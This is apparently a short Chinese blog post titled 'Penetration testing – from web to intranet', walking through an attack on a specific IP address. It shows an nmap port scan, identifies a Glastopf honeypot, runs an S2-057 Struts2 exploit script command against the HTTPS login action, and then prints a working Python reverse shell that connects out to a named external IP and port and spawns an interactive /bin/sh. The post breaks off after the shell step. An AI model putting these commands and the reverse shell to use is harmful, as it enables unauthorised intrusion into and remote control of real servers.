美文网首页
渗透测试—从web到内网

渗透测试—从web到内网

作者: 小小怪吃吃吃 | 来源:发表于2020-11-11 15:37 被阅读0次

1、nmap端口扫描
nmap 124.16.75.162 -p1-10000
发现443https、80http、222mysql、322ssh服务。

2、http服务

蜜罐web界面
发现是一台Glastopf蜜罐,详见https://zhuanlan.zhihu.com/p/134705386

3、https服务
看到LoginAction,猜测是structs2漏洞,用工具探测一下,发现是s2-057漏洞。
```python S2-057-exp.py -u https://124.16.75.162/IndexAction.action -p S2-057-2 -c shell命令 --exp``

s2-057

4、上传shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("123.206.92.61",4567))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

相关文章

网友评论

      本文标题:渗透测试—从web到内网

      本文链接:https://www.haomeiwen.com/subject/yrptnhtx.html